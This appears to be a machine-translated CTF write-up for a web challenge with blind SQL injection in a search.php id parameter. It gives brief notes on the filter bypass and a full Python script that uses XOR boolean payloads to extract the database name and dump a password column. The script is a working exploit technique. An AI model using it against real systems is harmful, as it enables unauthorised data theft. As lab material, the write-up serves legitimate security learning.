- 12345 have been clicked visit id=6 prompt
Clever! But not this table.- It is guessed here that there is SQL injection in the id, instead of the previous login box
- I made a preliminary judgment. It is a digital injection and some characters need to be fuzzed.
- The spaces are filtered out, and the () union is used to inject these and they are also filtered.
- FinalSQL can think of it should be a blind type problem hehehe
- ^If you are not filtered, you can do something here
- The question has a hint that it is blind, so this question is still running the script
import requests
import sys
import time
def get_DBlen(url):
for i in range(1,10):
db_url = url+"1^1^(length(database())=%d)#"%i
r = requests.get(db_url)
if "Click" in r.text:
print("数据库名称的长度为:%d"%i)
return i
def get_DBname(url,length):
DBname = ""
length = length + 1
for i in range(1,length):
Max = 122
Min = 41
Mid = (Max+Min)//2
while Min <= Max:
db_url = url+"1^1^(ascii(substr(database(),%d,1))>=%d)#"%(i,Mid)
r = requests.get(db_url)
if "Click" in r.text:
Min=Mid+1
Mid=(Min+Max)//2
pass
else:
Max = Mid-1
Mid = (Min+Max)//2
pass
pass
DBname = DBname + chr(Mid)
print(DBname)
return DBname
def get_TBname(url):
name=""
i = 0
while True:
i = i+1
Max = 128
Min = 32
Mid = (Max+Min)//2
while Min <= Max:
db_url = url+"1^1^(ascii(substr((select(group_concat(password))from(F1naI1y)),%d,1))>=%d)"%(i,Mid)
r = requests.get(db_url)
if "Click" in r.text:
Min=Mid+1
Mid=(Min+Max)//2
pass
else:
Max=Mid-1
Mid=(Min+Max)//2
pass
pass
name=name+chr(Mid)
print(name)
if Mid == 31:
break
time.sleep(0.5)
if __name__=="__main__":
url = "http://ff1a7c21-003a-43f1-85ec-8bbd9c55b53a.node3.buuoj.cn/search.php?id="
db_Len = get_DBlen(url)
db_Name = get_DBname(url,db_Len)
tb_name = get_TBname(url)
- Let me spit, this script ran wrong two or three times when I ran the flag and finally changed it manually...
- Changed the script